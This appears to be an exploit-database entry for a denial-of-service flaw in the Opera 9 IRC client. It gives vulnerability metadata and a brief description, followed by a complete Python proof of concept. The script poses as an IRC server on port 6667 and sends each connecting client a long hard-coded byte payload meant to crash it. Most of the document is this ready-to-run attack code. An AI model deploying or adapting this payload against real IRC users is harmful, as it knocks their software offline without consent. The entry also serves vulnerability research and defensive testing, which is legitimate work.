Opera 9 IRC client DOS

vendor:

Opera IRC client

by:

NNP + Preddy

5.5

CVSS

MEDIUM

Denial of Service (DoS)

CWE

Product Name: Opera IRC client

Affected Version From: Opera 9

Affected Version To: Opera 9

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

This exploit causes the Opera 9 IRC client to crash, resulting in a denial of service. The exploit is in the form of a string of characters that is sent to the client, causing it to become unresponsive and crash.

Mitigation:

There is no known mitigation for this vulnerability. It is recommended to use an updated version of the Opera IRC client or switch to a different IRC client.

Source

Exploit-DB raw data:

#!/usr/bin/python

#
# Opera 9 IRC client DOS
# NNP + Preddy
# http://silenthack.co.uk
# http://smashthestack.org
# http://www.team-rootshell.com
#

import socket

die = '''\x3a\x61\x61\x61\x20\x33\x35\x33
\x20\x15\xf8\x9c\x71\x0a\x3a\x64
\xff\x26\xf8\x9b\x33\xd2\x9b\x34
\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8
\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6
\xb3\xde\x42\x25\xe8\x7c\x89\xe7
\xa2\x81\x83\xd6\x53\x1e\x0a\xf7
\xc5\x87\x59\x97\x2f\x88\x4f\xc9
\x0d\xb2\x07\x2b\x50\xed\xd1\x03
\xcb\x13\x28\xb3\x90\xb1\x9b\x32
\x32\x1e\x08\x85\x3c\x13\x7c\x02
\x9a\xd6\x99\xca\x5e\xe8\x93\x6c
\x9a\x9b\x97\xea\x88\x69\xed\x54
\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa
\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5
\xd2\x98\xbf\x30\x80\x52\x9c\x1a
\xed\x34\x04\x76\x9d\xf1\xca\x19
\x07\xd1\x26\xcf\x74\x65\xc9\x34
\xac\x48\x31\x07\x44\x30\xfc\x16
\xc8\xbb\x47\x48\x0d\xe3\x62\xfb
\x17\x66\x71\xb4\x58\x3b\xce\x5f
\x0c\xf4\x2e\x80\x59\xf7\xb5\x05
\x40\xe6\x0c\x84\x17\x08\x9b\xdf
\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd
\xf1\x3d\x91\x49\x78\x5f\xa8\x84
\x53\xd7\x05\xac\xce\xba\xb2\x0e
\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a
\x10\xbf\x5b\xd5\x49\x27\xb2\x3a
\x64\x44\x83\xdc\xa3\x2c\x61\xf7
\x03\x66\xa3\xd1\x20\x55\xe0\xc0
\x14\x73\x78\xdb\xa1\x0f\x65\xb1
\xce\xc1\x86\x17\xe8\x39\x52\x4d
\x7d\xd5\x29\x20\x01\x8a\x17\x04
\xf0\xbb\xd6\x10\x10\xb6\xd1\x24
\x29\x49\xff\xca\x58\x65\x7b\x26
\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7
\x65\x85\xd8\x66\x0f\xef\x6b\x00
\xaa\x41\x10\xbb\xf7\xe1\xdf\x20
\x2a\xdf\xea\x82\x44\x65\xa8\x6a
\x66\xe6\x78\xa1\x75\xd4\x58\xda
\x59\x30\x41\x68\x20\xac\x68\xca
\xed\x79\x85\xe4\x5a\x65\x04\x85
\x44\xee\x07\x88\x53\xb0\xf2\xb9
\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97
\xe3\x27\x00\x03\xd3\x68\xce\xc0
\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc
\x96\xc8\x84\xe9\x78\x76\xa2\x0e
\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93
\x27\xb7\x97\xfa\x1f\x65\xba\x01
\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c
\xc6\xf2\x85\x3f\x68\x27\x4d\x49
\x24\x67\x69\xd4\x67\x20\x68\x8e
\xd7\xff\x88\xf6\x64\x42\xf7\x1c
\xa0\x34\x8d\xa6\x32\xfb\x42\xf9
\xed\xc7\x38\x55\xef\x85\x9f\x13
\xed\x08\xe8\x54\x28\x50\xe3\xff
\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e
\x21\x5d\xf5\x54\x58\x37\x4d\x45
\xff\x85\x9a\xee\x0a\x39\x01\xf7
\x41\xe9\x4c\x69\x39\x2f\x68\x88
\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c
\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2
\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a
\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa
\x4a\x99\xf2\x95\xa4\x89\x02\x0c
\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62
\x70\x4c\xff\x49\xfe\x94\x64\x99
\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f
\x65\x20\xb4\x09\xaa\xb6\x15\xbf
\x79\xe1\x98\x49\xb2\x34\xab\x22
\x80\xab\x6c\x7e\x3f\xd0\x17\xb3
\xb8\x86\x37\x8c\x52\x65\xab\xb7
\x86\x60\xc0\x30\x16\xd5\xef\x8f
\xb6\x88\xd8\x68\xbc\x84\x8a\x3c
\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e
\x57\x59\x0b\xa9\xbe\xb6\x60\x44
\x16\x20\x74\x2d\xf5\x64\xbc\xab
\xec\x95\x13\xa8\x19\x9e\xe4\x48
\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7
\x30\xe4\x70\xef\x9b\xd1\x33\xb1
\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8
\x30\xa6\xa0\x49\x44\x84\x91\xd8
\x22\x47\x33\x91\x1e\x0d\x58\x4f
\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b
\x19\x1c\x72\x25\xb7\x05\x1d\xe7
\xab\xbd\x30\xef\x41\xc1\xc7\x63
\x08\xfb\xf5\x27\x08\x4d\x76\xf9
\x16\xb4\x86\xb0\x25\xc4\x3c\x3f
\xe0\xae\x64\x98\xb3\x82\x7f\x5e
\x3f\xb0\x4d\x81\x71\x15\xe4\x7a
\x10\xd9\xa1\x18\x27\x17\x11\x3d
\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c
\xd8\x94\xd4\x8c\x16\x53\xea\x55
\x03\x38\xd6\x75\x4d\xbb\xef\x5d
\x94\x90\x75\xbb\xa7\x86\xf9\x72
\x1e\xe7\x62\x79\x11\x92\xb5\xe9
\x26\x89\x75\x3c\xdd\x60\x91\xe0
\x98\x68\x55\xe5\x23\x44\x42\xb7
\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b
\x53\x50\xd5\x64\xe2\x8a\x4d\x08
\x14\xc3\x44\xf1\x23\xd5\xd1\xbb
\x3d\x27\xa0\x60\x6b\xe2\x18\x40
\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a
\xf9\x07\xae\xdb\x91\xfb\xe3\xa5
\xbe\x27\x96\xe1\xfc\x68\x9c\x3a
\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7
\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98
\xc7\x2c\x73\x58\x28\x56\xfe\xe6
\x7d\x94\xc8\x79\xfc\x64\xb3\x8b
\xa1\x4e\x86\xbf\x00\xc0\x77\x3e
\xb6\x05\x72\x55\xc5\xf1\xed\x8c
\x1d\x60\xe4\x45\xb6\xe2\x2c\x33
\x77\xf4\xad\x73\x58\x60\xff\xf9
\xae\x85\xb9\xaf\x45\x30\xed\xfc
\x35\x5f\x51\xfa\x50\x3f\x86\x6e
\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4
\xd3\x36\x37\x2c\x97\x36\x25\x45
\xbb\xde\xf4\x01\x0e\xe1\xfd\x43
\x41\x4e\x3d\x91\x8d\xc3\xff\x2d
\x2e\xb3\x83\x7b\x92\x0c\x3f\x66
\x43\x76\x92\xda\xad\xb7\x1f\x68
\x96\x14\x69\xa4\xf5\x66\xe8\x36
\xb5\x25\xc8\x42\xe9\xc7\x6f\x17
\x7a\xf2\x92\x0d\xff\xd1\x73\x42
\x47\x05\x1c\xf4\xbc\x3b\x5d\x52
\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2
\x04\x43\x24\xed\x0b\x94\x04\x85
\x86\x96\x92\x85\x67\x05\xc7\xaf
'''

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 6667))
s.listen(5)

while 1:
    (clientsock, address) = s.accept()
    sent = clientsock.send(die)
    print "Sent %d bytes" % sent
    sent = 0

# milw0rm.com [2006-08-13]